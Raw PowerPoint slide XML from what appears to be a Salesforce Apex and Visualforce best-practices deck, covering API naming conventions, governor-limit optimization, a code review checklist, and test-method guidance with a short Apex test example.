              <a:t>bypassable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>You need to create 2 custom fields (checkboxes), 1 for VR and 1 for WF. Each rule will have to check this value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>API Name Best practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Remove underscores (_), prefer using lowercase and Capital letters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Ex : Avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>Customer_Score__c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> , prefer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>CustomerScore__c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Keep API names compact (less than 18 characters if possible)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Use abbreviates such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>OptyBONum__c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>OpportunityBackOfficeNumber__c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600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on’t use generic names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ex : Field1__c , Field2__c….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to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>productive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Reducing the delivery time, increasing Time-to-Value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>How to ensure a certain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>level of Quality </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Less bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> happy customer !</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>How to be able to reduce effort overhead, reducing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>Costs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Smaller teams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Quicker process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>How to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>reactive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> in case of a production issue ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Capability to solve an issue without a new roll-out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175106" name="Picture 2" descr="http://www.successful.com.au/blog/wp-content/uploads/2009/05/projectpriorityperspectivelogoc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4075" y="3429000"/>
            <a:ext cx="3209925" cy="2486026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175108" name="Picture 4" descr="http://kmstandards.com/wpblog/wp-content/uploads/2014/10/projectManagementTriangle-e141279755045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04800"/>
            <a:ext cx="1981200" cy="2076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609600" y="2184400"/>
            <a:ext cx="8035925" cy="22860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&lt;PAD/DEV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Best Practices </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="54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&lt;PAD - Governor Optimization&gt;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1371600"/>
            <a:ext cx="8177212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Reducing queries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In the trigger conditions, never put any SOQL query.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/>
              <a:t>Do it in the class code, and only if needed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/>
              <a:t>There will be no governor impact for other code being developed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Don’t be afraid of doing twice your condition evaluation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/>
              <a:t>This can be sometimes a way to reduce queries and DMLs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Always optimize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/>
              <a:t>Even if you think it is not needed, as your trigger can be run from another trigger, which can reach governor limits.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 smtClean="0"/>
              <a:t>Beware of over optimization side effects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 smtClean="0"/>
              <a:t>When optimizing SOQL queries and DMLs, you will probably use structured maps indexed by IDs. This consumes a lot in memory as triggers are limited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>in heap size and each trigger in the transaction can consume much heap. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Free memory if such structures are not needed after usage.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9538" y="685800"/>
            <a:ext cx="141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 rot="5400000" flipV="1">
            <a:off x="7136607" y="-615157"/>
            <a:ext cx="381000" cy="2220913"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60000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21"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6718300" y="869950"/>
            <a:ext cx="1011238" cy="415925"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49921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22"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="15" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7474507" y="922894"/>
            <a:ext cx="209550" cy="1716561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04800"/>
            <a:ext cx="488004" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14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38200"/>
            <a:ext cx="488004" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15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143000"/>
            <a:ext cx="488004" cy="533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&lt;Code review checklist&gt;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588" y="914400"/>
            <a:ext cx="7262812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200" dirty="0" smtClean="0"/>
              <a:t>Here is a list of some key points to browse when reviewing Apex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Self documented code : quantity of comments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Conform to design documents (pad spec)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Governor optimization (SOQL, DML, Memory, …)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Norms and naming conventions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Triggers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Deactivation system usage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No SOQL Query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Condition testing and calling a class method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Bulk compliancy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err="1" smtClean="0"/>
              <a:t>System.Debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>() usage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smtClean="0"/>
              <a:t>Classes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No SOQL in “for” loops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SOQL optimization using relationships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Bulk compliancy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Using static constants or labels instead of hard coded values as much as possible (maintainability)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Governor usage in the header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err="1" smtClean="0"/>
              <a:t>System.Debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>() usage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err="1" smtClean="0"/>
              <a:t>addError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>() usage when catching errors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000" dirty="0" err="1" smtClean="0"/>
              <a:t>testMethod</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000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sz="800" dirty="0" smtClean="0"/>
              <a:t>In a separate class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0" smtClean="0"/>
              <a:t>(TEST_)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0"/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Should run with success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Doing Bulk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Code coverage&gt; 75% (100% would be recommended)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No hard coded Id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err="1" smtClean="0"/>
              <a:t>startTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0"/>
              <a:t>stopTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
              <a:t>usage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900" dirty="0" smtClean="0"/>
              <a:t>Asserts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900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sz="1200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30724" name="Picture 5" descr="pe02032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&lt;Test methods&gt;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184275"/>
            <a:ext cx="6637337" cy="49117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fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>Aim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" b="1" dirty="0" smtClean="0"/>
              <a:t>100% test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>coverage</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1500" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="11113" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Build your own test dataset to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0" smtClean="0"/>
              <a:t>not rely on the existing records </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>(they may not exist for example)</a:t>
            </a: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r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>differ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> a user to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>System.runAs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t>(User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>aUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>method</a:t>
            </a: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r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>Visualforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>development</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> mass updates, mass insert, mass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>develoment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> and test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1" smtClean="0"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Bulk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>compliant</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1500" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1500" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Test.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>startTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(); and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Test.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>stopTest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> to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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>visualforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>governor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>limits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>instead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> Test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>context</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Initialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>every</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> variables and data sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> to analyse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>correctly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>governor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>limits</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1300" dirty="0" smtClean="0"/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6096000" y="152400"/>
            <a:ext cx="2827338" cy="155427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8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class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PAD_testExemple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{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Contact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[]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getContacts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(){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5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[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select id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from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contact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limit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8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>10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];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8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>static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testMethod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8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void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testMyController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{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fr-FR" sz="500" b="1" dirty="0" err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startTest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();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PageReference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pageRef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Page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="1" dirty="0" err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aPage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;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fr-FR" sz="500" b="1" dirty="0" err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setCurrentPage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pageRef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);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PAD_testExemple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controller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PAD_testExemple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();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controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="1" dirty="0" err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getContacts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();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fr-FR" sz="500" b="1" dirty="0" err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500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stopTest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();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5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500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3174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8400"/>
            <a:ext cx="1776413" cy="331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&lt;VisualForce - Make it simple&gt;</a:t>
            </a:r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0850" y="1222375"/>
            <a:ext cx="2835275" cy="1552575"/>
          </a:xfrm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3335338"/>
            <a:ext cx="2874962" cy="294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695325" y="2578100"/>
            <a:ext cx="2189163" cy="474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000"/>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800"/>
              <a:t>Search Market share : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"/>
              <a:t>63.7%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="700"/>
              <a:t>Source : comScore 2009</a:t>
            </a:r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696913" y="6026150"/>
            <a:ext cx="2189162" cy="474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000"/>
              <a:t>AOL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="800"/>
              <a:t>Search Market share :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"/>
              <a:t>3.7%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="700" i="1"/>
              <a:t>Source : comScore 2009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3814763" y="1195388"/>
            <a:ext cx="50927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139489" tIns="69745" rIns="139489" bIns="69745"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1600"/>
              <a:t>Make it as simple as possible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fr-FR" sz="1600"/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1600"/>
              <a:t>The « woow !  » may impress at first but :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1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
